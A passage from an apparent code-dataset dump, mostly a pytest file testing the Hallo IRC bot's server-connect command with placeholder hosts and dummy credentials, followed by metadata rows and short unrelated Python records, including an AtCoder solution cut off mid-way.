test_hallo.function_dispatcher.dispatch(
EventMessage(
test_hallo.test_server,
test_hallo.test_chan,
test_hallo.test_user,
"connect irc example.com server_port=abc",
)
)
# Check response
data = test_hallo.test_server.get_send_data(1, test_hallo.test_chan, EventMessage)
assert "error" in data[0].text.lower(), "Connect didn't respond with an error."
assert "invalid port" in data[0].text.lower(), (
"Connect returned the wrong error (" + str(data[0].text) + ")"
)
def test_null_address(hallo_getter):
test_hallo = hallo_getter({"server_control"})
# Run command
test_hallo.function_dispatcher.dispatch(
EventMessage(test_hallo.test_server, test_hallo.test_chan, test_hallo.test_user, "connect irc")
)
# Check response
data = test_hallo.test_server.get_send_data(1, test_hallo.test_chan, EventMessage)
assert "error" in data[0].text.lower(), "Connect didn't respond with an error."
assert "no server address" in data[0].text.lower(), (
"Connect returned the wrong error (" + str(data[0].text) + ")"
)
def test_specified_server_name(hallo_getter):
test_hallo = hallo_getter({"server_control"})
# Test vars
test_name = "test_server"
test_server = "www.example.com"
# Run command
test_hallo.function_dispatcher.dispatch(
EventMessage(
test_hallo.test_server,
test_hallo.test_chan,
test_hallo.test_user,
"connect irc "
+ test_server
+ " server_port=80 server_name="
+ test_name,
)
)
# Ensure correct response
data = test_hallo.test_server.get_send_data(1, test_hallo.test_chan, EventMessage)
assert (
"connected to new irc server" in data[0].text.lower()
), "Incorrect output: " + str(data[0].text)
# Find the right server
assert (
len(test_hallo.server_list) == 2
), "Incorrect number of servers in hallo instance."
right_server = None # type: ServerIRC
for server in test_hallo.server_list:
if server is not test_hallo.test_server:
right_server = server
assert right_server is not None, "New server wasn't found."
assert right_server.server_address == test_server, "Address incorrect"
assert right_server.name == test_name, "Name incorrect"
def test_get_server_name_from_domain(hallo_getter):
test_hallo = hallo_getter({"server_control"})
# Test vars
test_name = "example"
test_server = "www." + test_name + ".com"
# Run command
test_hallo.function_dispatcher.dispatch(
EventMessage(
test_hallo.test_server,
test_hallo.test_chan,
test_hallo.test_user,
"connect irc " + test_server + " server_port=80",
)
)
# Ensure correct response
data = test_hallo.test_server.get_send_data(1, test_hallo.test_chan, EventMessage)
assert (
"connected to new irc server" in data[0].text.lower()
), "Incorrect output: " + str(data[0].text)
# Find the right server
assert (
len(test_hallo.server_list) == 2
), "Incorrect number of servers in hallo instance."
right_server = None # type: ServerIRC
for server in test_hallo.server_list:
if server is not test_hallo.test_server:
right_server = server
assert right_server is not None, "New server wasn't found."
assert right_server.server_address == test_server, "Address incorrect"
assert right_server.name == test_name, "Name incorrect"
def test_auto_connect_default(hallo_getter):
test_hallo = hallo_getter({"server_control"})
# Run command
test_hallo.function_dispatcher.dispatch(
EventMessage(
test_hallo.test_server,
test_hallo.test_chan,
test_hallo.test_user,
"connect irc www.example.com:80",
)
)
# Ensure correct response
data = test_hallo.test_server.get_send_data(1, test_hallo.test_chan, EventMessage)
assert (
"connected to new irc server" in data[0].text.lower()
), "Incorrect output: " + str(data[0].text)
# Find the right server
assert (
len(test_hallo.server_list) == 2
), "Incorrect number of servers in hallo instance."
right_server = None # type: ServerIRC
for server in test_hallo.server_list:
if server is not test_hallo.test_server:
right_server = server
assert right_server is not None, "New server wasn't found."
assert right_server.auto_connect, "Auto connect didn't default to true"
def test_auto_connect_true(hallo_getter):
test_hallo = hallo_getter({"server_control"})
# Run command
test_hallo.function_dispatcher.dispatch(
EventMessage(
test_hallo.test_server,
test_hallo.test_chan,
test_hallo.test_user,
"connect irc www.example.com:80 auto_connect=true",
)
)
# Ensure correct response
data = test_hallo.test_server.get_send_data(1, test_hallo.test_chan, EventMessage)
assert (
"connected to new irc server" in data[0].text.lower()
), "Incorrect output: " + str(data[0].text)
# Find the right server
assert (
len(test_hallo.server_list) == 2
), "Incorrect number of servers in hallo instance."
right_server = None # type: ServerIRC
for server in test_hallo.server_list:
if server is not test_hallo.test_server:
right_server = server
assert right_server is not None, "New server wasn't found."
assert right_server.auto_connect, "Auto connect didn't set to true"
def test_auto_connect_false(hallo_getter):
test_hallo = hallo_getter({"server_control"})
# Run command
test_hallo.function_dispatcher.dispatch(
EventMessage(
test_hallo.test_server,
test_hallo.test_chan,
test_hallo.test_user,
"connect irc www.example.com:80 auto_connect=false",
)
)
# Ensure correct response
data = test_hallo.test_server.get_send_data(1, test_hallo.test_chan, EventMessage)
assert (
"connected to new irc server" in data[0].text.lower()
), "Incorrect output: " + str(data[0].text)
# Find the right server
assert (
len(test_hallo.server_list) == 2
), "Incorrect number of servers in hallo instance."
right_server = None # type: ServerIRC
for server in test_hallo.server_list:
if server is not test_hallo.test_server:
right_server = server
assert right_server is not None, "New server wasn't found."
assert not right_server.auto_connect, "Auto connect didn't set to false"
def test_server_nick_inherit(hallo_getter):
test_hallo = hallo_getter({"server_control"})
# Set up
test_nick = "test_hallo"
test_hallo.test_server.nick = test_nick
# Run command
test_hallo.function_dispatcher.dispatch(
EventMessage(
test_hallo.test_server,
test_hallo.test_chan,
test_hallo.test_user,
"connect irc www.example.com:80",
)
)
# Ensure correct response
data = test_hallo.test_server.get_send_data(1, test_hallo.test_chan, EventMessage)
assert (
"connected to new irc server" in data[0].text.lower()
), "Incorrect output: " + str(data[0].text)
# Find the right server
assert (
len(test_hallo.server_list) == 2
), "Incorrect number of servers in hallo instance."
right_server = None # type: ServerIRC
for server in test_hallo.server_list:
if server is not test_hallo.test_server:
right_server = server
assert right_server is not None, "New server wasn't found."
assert right_server.nick == test_nick, "Nick did not inherit from other server"
def test_server_nick_specified(hallo_getter):
test_hallo = hallo_getter({"server_control"})
# Set up
test_nick = "test_hallo2"
# Run command
test_hallo.function_dispatcher.dispatch(
EventMessage(
test_hallo.test_server,
test_hallo.test_chan,
test_hallo.test_user,
"connect irc www.example.com:80 nick=" + test_nick,
)
)
# Ensure correct response
data = test_hallo.test_server.get_send_data(1, test_hallo.test_chan, EventMessage)
assert (
"connected to new irc server" in data[0].text.lower()
), "Incorrect output: " + str(data[0].text)
# Find the right server
assert (
len(test_hallo.server_list) == 2
), "Incorrect number of servers in hallo instance."
right_server = None # type: ServerIRC
for server in test_hallo.server_list:
if server is not test_hallo.test_server:
right_server = server
assert right_server is not None, "New server wasn't found."
assert right_server.nick == test_nick, "Specified nick was not used"
def test_server_prefix_specified_string(hallo_getter):
test_hallo = hallo_getter({"server_control"})
# Set up
test_prefix = "robot"
# Run command
test_hallo.function_dispatcher.dispatch(
EventMessage(
test_hallo.test_server,
test_hallo.test_chan,
test_hallo.test_user,
"connect irc www.example.com:80 prefix=" + test_prefix,
)
)
# Ensure correct response
data = test_hallo.test_server.get_send_data(1, test_hallo.test_chan, EventMessage)
assert (
"connected to new irc server" in data[0].text.lower()
), "Incorrect output: " + str(data[0].text)
# Find the right server
assert (
len(test_hallo.server_list) == 2
), "Incorrect number of servers in hallo instance."
right_server = None # type: ServerIRC
for server in test_hallo.server_list:
if server is not test_hallo.test_server:
right_server = server
assert right_server is not None, "New server wasn't found."
assert right_server.prefix == test_prefix, "Specified prefix was not used"
def test_server_prefix_specified_none(hallo_getter):
test_hallo = hallo_getter({"server_control"})
# Run command
test_hallo.function_dispatcher.dispatch(
EventMessage(
test_hallo.test_server,
test_hallo.test_chan,
test_hallo.test_user,
"connect irc www.example.com:80 prefix=none",
)
)
# Ensure correct response
data = test_hallo.test_server.get_send_data(1, test_hallo.test_chan, EventMessage)
assert (
"connected to new irc server" in data[0].text.lower()
), "Incorrect output: " + str(data[0].text)
# Find the right server
assert (
len(test_hallo.server_list) == 2
), "Incorrect number of servers in hallo instance."
right_server = None # type: ServerIRC
for server in test_hallo.server_list:
if server is not test_hallo.test_server:
right_server = server
assert right_server is not None, "New server wasn't found."
assert right_server.prefix is None, "Prefix wasn't set to None as specified"
def test_server_prefix_inherit_string(hallo_getter):
test_hallo = hallo_getter({"server_control"})
# Set up
test_prefix = "robot"
test_hallo.test_server.prefix = test_prefix
# Run command
test_hallo.function_dispatcher.dispatch(
EventMessage(
test_hallo.test_server,
test_hallo.test_chan,
test_hallo.test_user,
test_prefix + " connect irc www.example.com:80",
)
)
# Ensure correct response
data = test_hallo.test_server.get_send_data(1, test_hallo.test_chan, EventMessage)
assert (
"connected to new irc server" in data[0].text.lower()
), "Incorrect output: " + str(data[0].text)
# Find the right server
assert (
len(test_hallo.server_list) == 2
), "Incorrect number of servers in hallo instance."
right_server = None # type: ServerIRC
for server in test_hallo.server_list:
if server is not test_hallo.test_server:
right_server = server
assert right_server is not None, "New server wasn't found."
assert right_server.prefix == test_prefix, "Inherited prefix was not used"
def test_server_prefix_inherit_none(hallo_getter):
test_hallo = hallo_getter({"server_control"})
# Set up
test_hallo.test_server.prefix = None
test_hallo.default_prefix = ""
# Run command
test_hallo.function_dispatcher.dispatch(
EventMessage(
test_hallo.test_server,
test_hallo.test_chan,
test_hallo.test_user,
"connect irc www.example.com:80",
)
)
# Ensure correct response
data = test_hallo.test_server.get_send_data(1, test_hallo.test_chan, EventMessage)
assert (
"connected to new irc server" in data[0].text.lower()
), "Incorrect output: " + str(data[0].text)
# Find the right server
assert (
len(test_hallo.server_list) == 2
), "Incorrect number of servers in hallo instance."
right_server = None # type: ServerIRC
for server in test_hallo.server_list:
if server is not test_hallo.test_server:
right_server = server
assert right_server is not None, "New server wasn't found."
assert right_server.prefix is None, "Prefix wasn't inherited as None"
def test_full_name_specified_string(hallo_getter):
test_hallo = hallo_getter({"server_control"})
# Set up
test_name = "Hallo_Robot"
# Run command
test_hallo.function_dispatcher.dispatch(
EventMessage(
test_hallo.test_server,
test_hallo.test_chan,
test_hallo.test_user,
"connect irc www.example.com:80 full_name=" + test_name,
)
)
# Ensure correct response
data = test_hallo.test_server.get_send_data(1, test_hallo.test_chan, EventMessage)
assert (
"connected to new irc server" in data[0].text.lower()
), "Incorrect output: " + str(data[0].text)
# Find the right server
assert (
len(test_hallo.server_list) == 2
), "Incorrect number of servers in hallo instance."
right_server = None # type: ServerIRC
for server in test_hallo.server_list:
if server is not test_hallo.test_server:
right_server = server
assert right_server is not None, "New server wasn't found."
assert right_server.full_name == test_name, "Specified full name was not used"
def test_full_name_inherit_string(hallo_getter):
test_hallo = hallo_getter({"server_control"})
# Set up
test_name = "Hallo_Robot"
test_hallo.test_server.full_name = test_name
# Run command
test_hallo.function_dispatcher.dispatch(
EventMessage(
test_hallo.test_server,
test_hallo.test_chan,
test_hallo.test_user,
"connect irc www.example.com:80",
)
)
# Ensure correct response
data = test_hallo.test_server.get_send_data(1, test_hallo.test_chan, EventMessage)
assert (
"connected to new irc server" in data[0].text.lower()
), "Incorrect output: " + str(data[0].text)
# Find the right server
assert (
len(test_hallo.server_list) == 2
), "Incorrect number of servers in hallo instance."
right_server = None # type: ServerIRC
for server in test_hallo.server_list:
if server is not test_hallo.test_server:
right_server = server
assert right_server is not None, "New server wasn't found."
assert right_server.full_name == test_name, "Inherited full name was not used"
def test_nickserv_nick_default(hallo_getter):
test_hallo = hallo_getter({"server_control"})
# Run command
test_hallo.function_dispatcher.dispatch(
EventMessage(
test_hallo.test_server,
test_hallo.test_chan,
test_hallo.test_user,
"connect irc www.example.com:80",
)
)
# Ensure correct response
data = test_hallo.test_server.get_send_data(1, test_hallo.test_chan, EventMessage)
assert (
"connected to new irc server" in data[0].text.lower()
), "Incorrect output: " + str(data[0].text)
# Find the right server
assert (
len(test_hallo.server_list) == 2
), "Incorrect number of servers in hallo instance."
right_server = None # type: ServerIRC
for server in test_hallo.server_list:
if server is not test_hallo.test_server:
right_server = server
assert right_server is not None, "New server wasn't found."
assert (
right_server.nickserv_nick == "nickserv"
), "Default nickserv nick incorrect"
def test_nickserv_nick_inherit(hallo_getter):
test_hallo = hallo_getter({"server_control"})
# Set up
test_nickserv_name = "nameserv"
test_serv_irc = ServerIRC(test_hallo)
test_serv_irc.prefix = ""
test_serv_irc.name = "test_serv_irc"
test_serv_irc.nickserv_nick = test_nickserv_name
test_chan_irc = test_serv_irc.get_channel_by_address(
"test_chan".lower(), "test_chan"
)
test_user_irc = test_serv_irc.get_user_by_address(
"test_user".lower(), "test_user"
)
# Run command
test_hallo.function_dispatcher.dispatch(
EventMessage(
test_serv_irc,
test_chan_irc,
test_user_irc,
"connect irc example.com:80",
)
)
# Can't check response because I'm using a ServerIRC instead of a ServerMock
# Find the right server
assert (
len(test_hallo.server_list) == 2
), "Incorrect number of servers in hallo instance."
right_server = None # type: ServerIRC
for server in test_hallo.server_list:
if server is not test_hallo.test_server:
right_server = server
assert right_server is not None, "New server wasn't found."
assert (
right_server.nickserv_nick == test_nickserv_name
), "Nickserv nick wasn't inherited"
def test_nickserv_nick_specify(hallo_getter):
test_hallo = hallo_getter({"server_control"})
# Set up
test_nickserv_name = "nameserv"
# Run command
test_hallo.function_dispatcher.dispatch(
EventMessage(
test_hallo.test_server,
test_hallo.test_chan,
test_hallo.test_user,
"connect irc www.example.com:80 nickserv_nick=" + test_nickserv_name,
)
)
# Ensure correct response
data = test_hallo.test_server.get_send_data(1, test_hallo.test_chan, EventMessage)
assert (
"connected to new irc server" in data[0].text.lower()
), "Incorrect output: " + str(data[0].text)
# Find the right server
assert (
len(test_hallo.server_list) == 2
), "Incorrect number of servers in hallo instance."
right_server = None # type: ServerIRC
for server in test_hallo.server_list:
if server is not test_hallo.test_server:
right_server = server
assert right_server is not None, "New server wasn't found."
assert (
right_server.nickserv_nick == test_nickserv_name
), "Specified nickserv nick wasn't set"
def test_nickserv_identity_command_default(hallo_getter):
test_hallo = hallo_getter({"server_control"})
# Run command
test_hallo.function_dispatcher.dispatch(
EventMessage(
test_hallo.test_server,
test_hallo.test_chan,
test_hallo.test_user,
"connect irc www.example.com:80",
)
)
# Ensure correct response
data = test_hallo.test_server.get_send_data(1, test_hallo.test_chan, EventMessage)
assert (
"connected to new irc server" in data[0].text.lower()
), "Incorrect output: " + str(data[0].text)
# Find the right server
assert (
len(test_hallo.server_list) == 2
), "Incorrect number of servers in hallo instance."
right_server = None # type: ServerIRC
for server in test_hallo.server_list:
if server is not test_hallo.test_server:
right_server = server
assert right_server is not None, "New server wasn't found."
assert (
right_server.nickserv_ident_command == "status"
), "Default nickserv identity command incorrect"
def test_nickserv_identity_command_inherit(hallo_getter):
test_hallo = hallo_getter({"server_control"})
# Set up
test_nickserv_command = "identity"
test_serv_irc = ServerIRC(test_hallo)
test_serv_irc.prefix = ""
test_serv_irc.name = "test_serv_irc"
test_serv_irc.nickserv_ident_command = test_nickserv_command
test_chan_irc = test_serv_irc.get_channel_by_address(
"test_chan".lower(), "test_chan"
)
test_user_irc = test_serv_irc.get_user_by_address(
"test_user".lower(), "test_user"
)
# Run command
test_hallo.function_dispatcher.dispatch(
EventMessage(
test_serv_irc,
test_chan_irc,
test_user_irc,
"connect irc example.com:80",
)
)
# Can't check response because I'm using a ServerIRC instead of a ServerMock
# Find the right server
assert (
len(test_hallo.server_list) == 2
), "Incorrect number of servers in hallo instance."
right_server = None # type: ServerIRC
for server in test_hallo.server_list:
if server is not test_hallo.test_server:
right_server = server
assert right_server is not None, "New server wasn't found."
assert (
right_server.nickserv_ident_command == test_nickserv_command
), "Nickserv identity command wasn't inherited"
def test_nickserv_identity_command_specify(hallo_getter):
test_hallo = hallo_getter({"server_control"})
# Set up
test_nickserv_command = "identity"
# Run command
test_hallo.function_dispatcher.dispatch(
EventMessage(
test_hallo.test_server,
test_hallo.test_chan,
test_hallo.test_user,
"connect irc www.example.com:80 nickserv_identity_command="
+ test_nickserv_command,
)
)
# Ensure correct response
data = test_hallo.test_server.get_send_data(1, test_hallo.test_chan, EventMessage)
assert (
"connected to new irc server" in data[0].text.lower()
), "Incorrect output: " + str(data[0].text)
# Find the right server
assert (
len(test_hallo.server_list) == 2
), "Incorrect number of servers in hallo instance."
right_server = None # type: ServerIRC
for server in test_hallo.server_list:
if server is not test_hallo.test_server:
right_server = server
assert right_server is not None, "New server wasn't found."
assert (
right_server.nickserv_ident_command == test_nickserv_command
), "Specified nickserv identity command wasn't set"
def test_nickserv_identity_resp_default(hallo_getter):
test_hallo = hallo_getter({"server_control"})
# Run command
test_hallo.function_dispatcher.dispatch(
EventMessage(
test_hallo.test_server,
test_hallo.test_chan,
test_hallo.test_user,
"connect irc www.example.com:80",
)
)
# Ensure correct response
data = test_hallo.test_server.get_send_data(1, test_hallo.test_chan, EventMessage)
assert (
"connected to new irc server" in data[0].text.lower()
), "Incorrect output: " + str(data[0].text)
# Find the right server
assert (
len(test_hallo.server_list) == 2
), "Incorrect number of servers in hallo instance."
right_server = None # type: ServerIRC
for server in test_hallo.server_list:
if server is not test_hallo.test_server:
right_server = server
assert right_server is not None, "New server wasn't found."
assert (
right_server.nickserv_ident_response == "^status [^ ]+ 3$"
), "Default nickserv identity response incorrect"
def test_nickserv_identity_response_inherit(hallo_getter):
test_hallo = hallo_getter({"server_control"})
# Set up
test_nickserv_response = "identity"
test_serv_irc = ServerIRC(test_hallo)
test_serv_irc.prefix = ""
test_serv_irc.name = "test_serv_irc"
test_serv_irc.nickserv_ident_response = test_nickserv_response
test_chan_irc = test_serv_irc.get_channel_by_address(
"test_chan".lower(), "test_chan"
)
test_user_irc = test_serv_irc.get_user_by_address(
"test_user".lower(), "test_user"
)
# Run command
test_hallo.function_dispatcher.dispatch(
EventMessage(
test_serv_irc,
test_chan_irc,
test_user_irc,
"connect irc example.com:80",
)
)
# Can't check response because I'm using a ServerIRC instead of a ServerMock
# Find the right server
assert (
len(test_hallo.server_list) == 2
), "Incorrect number of servers in hallo instance."
right_server = None # type: ServerIRC
for server in test_hallo.server_list:
if server is not test_hallo.test_server:
right_server = server
assert right_server is not None, "New server wasn't found."
assert (
right_server.nickserv_ident_response == test_nickserv_response
), "Nickserv identity response wasn't inherited"
def test_nickserv_identity_response_specify(hallo_getter):
test_hallo = hallo_getter({"server_control"})
# Set up
test_nickserv_response = "identity"
# Run command
test_hallo.function_dispatcher.dispatch(
EventMessage(
test_hallo.test_server,
test_hallo.test_chan,
test_hallo.test_user,
"connect irc www.example.com:80 nickserv_identity_resp="
+ test_nickserv_response,
)
)
# Ensure correct response
data = test_hallo.test_server.get_send_data(1, test_hallo.test_chan, EventMessage)
assert (
"connected to new irc server" in data[0].text.lower()
), "Incorrect output: " + str(data[0].text)
# Find the right server
assert (
len(test_hallo.server_list) == 2
), "Incorrect number of servers in hallo instance."
right_server = None # type: ServerIRC
for server in test_hallo.server_list:
if server is not test_hallo.test_server:
right_server = server
assert right_server is not None, "New server wasn't found."
assert (
right_server.nickserv_ident_response == test_nickserv_response
), "Specified nickserv identity response wasn't set"
def test_nickserv_password_default(hallo_getter):
test_hallo = hallo_getter({"server_control"})
# Run command
test_hallo.function_dispatcher.dispatch(
EventMessage(
test_hallo.test_server,
test_hallo.test_chan,
test_hallo.test_user,
"connect irc www.example.com:80",
)
)
# Ensure correct response
data = test_hallo.test_server.get_send_data(1, test_hallo.test_chan, EventMessage)
assert (
"connected to new irc server" in data[0].text.lower()
), "Incorrect output: " + str(data[0].text)
# Find the right server
assert (
len(test_hallo.server_list) == 2
), "Incorrect number of servers in hallo instance."
right_server = None # type: ServerIRC
for server in test_hallo.server_list:
if server is not test_hallo.test_server:
right_server = server
assert right_server is not None, "New server wasn't found."
assert right_server.nickserv_pass is None, "Default nickserv password incorrect"
def test_nickserv_password_inherit(hallo_getter):
test_hallo = hallo_getter({"server_control"})
# Set up
test_nickserv_pass = "hunter2"
test_serv_irc = ServerIRC(test_hallo)
test_serv_irc.prefix = ""
test_serv_irc.name = "test_serv_irc"
test_serv_irc.nickserv_pass = test_nickserv_pass
test_chan_irc = test_serv_irc.get_channel_by_address(
"test_chan".lower(), "test_chan"
)
test_user_irc = test_serv_irc.get_user_by_address(
"test_user".lower(), "test_user"
)
# Run command
test_hallo.function_dispatcher.dispatch(
EventMessage(
test_serv_irc,
test_chan_irc,
test_user_irc,
"connect irc example.com:80",
)
)
# Can't check response because I'm using a ServerIRC instead of a ServerMock
# Find the right server
assert (
len(test_hallo.server_list) == 2
), "Incorrect number of servers in hallo instance."
right_server = None # type: ServerIRC
for server in test_hallo.server_list:
if server is not test_hallo.test_server:
right_server = server
assert right_server is not None, "New server wasn't found."
assert (
right_server.nickserv_pass == test_nickserv_pass
), "Nickserv password wasn't inherited"
def test_nickserv_password_specify(hallo_getter):
test_hallo = hallo_getter({"server_control"})
# Set up
test_nickserv_pass = "hunter2"
# Run command
test_hallo.function_dispatcher.dispatch(
EventMessage(
test_hallo.test_server,
test_hallo.test_chan,
test_hallo.test_user,
"connect irc www.example.com:80 nickserv_password="
+ test_nickserv_pass,
)
)
# Ensure correct response
data = test_hallo.test_server.get_send_data(1, test_hallo.test_chan, EventMessage)
assert (
"connected to new irc server" in data[0].text.lower()
), "Incorrect output: " + str(data[0].text)
# Find the right server
assert (
len(test_hallo.server_list) == 2
), "Incorrect number of servers in hallo instance."
right_server = None # type: ServerIRC
for server in test_hallo.server_list:
if server is not test_hallo.test_server:
right_server = server
assert right_server is not None, "New server wasn't found."
assert (
right_server.nickserv_pass == test_nickserv_pass
), "Specified nickserv password wasn't set"
def test_inherit_user_groups_default(hallo_getter):
test_hallo = hallo_getter({"server_control"})
# Set up
test_user_group = UserGroup("test_group", test_hallo)
test_hallo.test_user.add_user_group(test_user_group)
# Run command
test_hallo.function_dispatcher.dispatch(
EventMessage(
test_hallo.test_server,
test_hallo.test_chan,
test_hallo.test_user,
"connect irc www.example.com:80",
)
)
# Ensure correct response
data = test_hallo.test_server.get_send_data(1, test_hallo.test_chan, EventMessage)
assert (
"connected to new irc server" in data[0].text.lower()
), "Incorrect output: " + str(data[0].text)
# Find the right server
assert (
len(test_hallo.server_list) == 2
), "Incorrect number of servers in hallo instance."
right_server = None # type: ServerIRC
for server in test_hallo.server_list:
if server is not test_hallo.test_server:
right_server = server
assert right_server is not None, "New server wasn't found."
# Check user groups
new_user = right_server.get_user_by_address(
test_hallo.test_user.address, test_hallo.test_user.name
)
assert test_user_group in new_user.user_group_list
def test_inherit_user_groups_specify_nick(hallo_getter):
test_hallo = hallo_getter({"server_control"})
# Set up
test_user = "AzureDiamond"
test_user_group = UserGroup("test_group", test_hallo)
test_hallo.test_user.add_user_group(test_user_group)
# Run command
test_hallo.function_dispatcher.dispatch(
EventMessage(
test_hallo.test_server,
test_hallo.test_chan,
test_hallo.test_user,
"connect irc www.example.com:80 god=" + test_user,
)
)
# Ensure correct response
data = test_hallo.test_server.get_send_data(1, test_hallo.test_chan, EventMessage)
assert (
"connected to new irc server" in data[0].text.lower()
), "Incorrect output: " + str(data[0].text)
# Find the right server
assert (
len(test_hallo.server_list) == 2
), "Incorrect number of servers in hallo instance."
right_server = None # type: ServerIRC
for server in test_hallo.server_list:
if server is not test_hallo.test_server:
right_server = server
assert right_server is not None, "New server wasn't found."
# Check user groups
new_user = right_server.get_user_by_address(test_user.lower(), test_user)
assert test_user_group in new_user.user_group_list
def test_server_added(hallo_getter):
test_hallo = hallo_getter({"server_control"})
# Pre flight check
assert len(test_hallo.server_list) == 1, "Too many servers when starting test."
# Run command
test_hallo.function_dispatcher.dispatch(
EventMessage(
test_hallo.test_server,
test_hallo.test_chan,
test_hallo.test_user,
"connect irc www.example.com:80",
)
)
# Ensure correct response
data = test_hallo.test_server.get_send_data(1, test_hallo.test_chan, EventMessage)
assert (
"connected to new irc server" in data[0].text.lower()
), "Incorrect output: " + str(data[0].text)
# Find the right server
assert (
len(test_hallo.server_list) == 2
), "Incorrect number of servers in hallo instance."
right_server = None # type: ServerIRC
for server in test_hallo.server_list:
if server is not test_hallo.test_server:
right_server = server
assert right_server is not None, "New server wasn't found."
def test_thread_started(hallo_getter):
test_hallo = hallo_getter({"server_control"})
    # Pre-flight: record the running thread count
thread_count = threading.active_count()
# Run command
test_hallo.function_dispatcher.dispatch(
EventMessage(
test_hallo.test_server,
test_hallo.test_chan,
test_hallo.test_user,
"connect irc www.example.com:80",
)
)
# Ensure correct response
data = test_hallo.test_server.get_send_data(1, test_hallo.test_chan, EventMessage)
assert (
"connected to new irc server" in data[0].text.lower()
), "Incorrect output: " + str(data[0].text)
# Find the right server
assert (
len(test_hallo.server_list) == 2
), "Incorrect number of servers in hallo instance."
right_server = None # type: ServerIRC
for server in test_hallo.server_list:
if server is not test_hallo.test_server:
right_server = server
assert right_server is not None, "New server wasn't found."
# Ensure thread count is up
assert (
threading.active_count() == thread_count + 1
), "Incorrect number of running threads."
def test_server_started(hallo_getter):
test_hallo = hallo_getter({"server_control"})
# Run command
test_hallo.function_dispatcher.dispatch(
EventMessage(
test_hallo.test_server,
test_hallo.test_chan,
test_hallo.test_user,
"connect irc www.example.com:80",
)
)
# Ensure correct response
data = test_hallo.test_server.get_send_data(1, test_hallo.test_chan, EventMessage)
assert (
"connected to new irc server" in data[0].text.lower()
), "Incorrect output: " + str(data[0].text)
# Find the right server
assert (
len(test_hallo.server_list) == 2
), "Incorrect number of servers in hallo instance."
right_server = None # type: ServerIRC
for server in test_hallo.server_list:
if server is not test_hallo.test_server:
right_server = server
assert right_server is not None, "New server wasn't found."
# Ensure new server is started
assert right_server.state != Server.STATE_CLOSED, "New server was not started."
| 36.732989 | 103 | 0.66347 | 5,569 | 42,647 | 4.811995 | 0.026935 | 0.122248 | 0.104784 | 0.074446 | 0.945854 | 0.928614 | 0.920554 | 0.913613 | 0.908389 | 0.904918 | 0 | 0.006709 | 0.252069 | 42,647 | 1,160 | 104 | 36.764655 | 0.833433 | 0.075504 | 0 | 0.775899 | 0 | 0 | 0.188618 | 0.001248 | 0 | 0 | 0 | 0 | 0.150106 | 1 | 0.040169 | false | 0.013742 | 0.005285 | 0 | 0.045455 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
563e53b48146e3faea7d288d0ed69b660c57c9e5 | 170 | py | Python | src/UQpy/utilities/distances/__init__.py | SURGroup/UncertaintyQuantification | a94c8db47d07134ea2b3b0a3ca53ca818532c3e6 | [
"MIT"
] | null | null | null | src/UQpy/utilities/distances/__init__.py | SURGroup/UncertaintyQuantification | a94c8db47d07134ea2b3b0a3ca53ca818532c3e6 | [
"MIT"
] | null | null | null | src/UQpy/utilities/distances/__init__.py | SURGroup/UncertaintyQuantification | a94c8db47d07134ea2b3b0a3ca53ca818532c3e6 | [
"MIT"
] | null | null | null | from UQpy.utilities.distances.baseclass import *
from UQpy.utilities.distances.euclidean_distances import *
from UQpy.utilities.distances.grassmannian_distances import *
| 42.5 | 61 | 0.858824 | 20 | 170 | 7.2 | 0.4 | 0.166667 | 0.354167 | 0.541667 | 0.444444 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.070588 | 170 | 3 | 62 | 56.666667 | 0.911392 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
566fb9046a904e401812b9dbccf3266b3850b113 | 184 | py | Python | viper/modules/pdftools/__init__.py | Mario-Kart-Felix/mal-scrap | bc396a15ea5b144eb1c0f05759d1f9419d6671df | [
"BSD-3-Clause"
] | null | null | null | viper/modules/pdftools/__init__.py | Mario-Kart-Felix/mal-scrap | bc396a15ea5b144eb1c0f05759d1f9419d6671df | [
"BSD-3-Clause"
] | null | null | null | viper/modules/pdftools/__init__.py | Mario-Kart-Felix/mal-scrap | bc396a15ea5b144eb1c0f05759d1f9419d6671df | [
"BSD-3-Clause"
] | null | null | null | from .pdf_parser import cPDFParser, PDF_ELEMENT_COMMENT, PDF_ELEMENT_INDIRECT_OBJECT, PDF_ELEMENT_XREF, PDF_ELEMENT_TRAILER, PDF_ELEMENT_STARTXREF, PDF_ELEMENT_MALFORMED, FormatOutput
| 92 | 183 | 0.896739 | 25 | 184 | 6.04 | 0.56 | 0.397351 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.059783 | 184 | 1 | 184 | 184 | 0.872832 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
8eae096a9d6442105cddc1781237d27696c26fc1 | 1,316 | py | Python | abc205/abc205_c.py | Vermee81/practice-coding-contests | 78aada60fa75f208ee0eef337b33b27b1c260d18 | [
"MIT"
] | null | null | null | abc205/abc205_c.py | Vermee81/practice-coding-contests | 78aada60fa75f208ee0eef337b33b27b1c260d18 | [
"MIT"
] | null | null | null | abc205/abc205_c.py | Vermee81/practice-coding-contests | 78aada60fa75f208ee0eef337b33b27b1c260d18 | [
"MIT"
] | null | null | null | # https://atcoder.jp/contests/abc205/tasks/abc205_c
A, B, C = map(int, input().split())
if A > 0 and B > 0:
if A > B:
print('>')
exit()
if A < B:
print('<')
exit()
if A < 0 and B < 0:
    # Both negative: an even exponent compares absolute values, so the order
    # of A and B flips; an odd exponent preserves it. (The original branch had
